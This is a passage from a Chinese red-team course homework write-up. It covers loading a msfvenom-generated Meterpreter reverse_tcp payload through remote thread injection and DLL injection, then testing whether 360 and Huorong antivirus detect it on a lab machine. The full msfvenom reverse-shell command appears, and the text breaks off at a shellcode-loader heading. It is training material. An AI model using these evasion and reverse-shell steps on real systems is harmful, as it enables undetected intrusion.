文章来源|MS08067 红队培训班第12节课作业
本文作者:某学员A(红队培训班1期学员)
按老师要求尝试完成布置的作业如下:
一、远程线程注入
(一)通过MSF生成payload
通过msfvenom生成payload,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.103 lport=4444 -e x86/shikata_ga_nai -i 5 -f c -o ./Desktop/1.c
(二)通过远程线程注入加载payload
通过VS2019对payload进行处理:
编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。
(三)检测免杀
在Kali上开启msf监听
在靶机上运行Project1.exe,Kali机器获取到Session,并且360和火绒均未报毒
二、DLL注入
(一)通过DLL注入加载Payload
通过VS2019编译DLL文件,该DLL文件将加载之前用MSF产生的payload,经regsvr32测试可以使用
再通过VS2019编译DLL加载器,该加载器将会把指定DLL(Dll1.dll)加载到指定进程
(二)检测免杀
在Kali机器上开启msf监听
开启calc.exe,获取其PID信息
运行Project1.exe,Kali机器获取到Session,且火绒和360未报毒
三、Shellcode加载器
&#x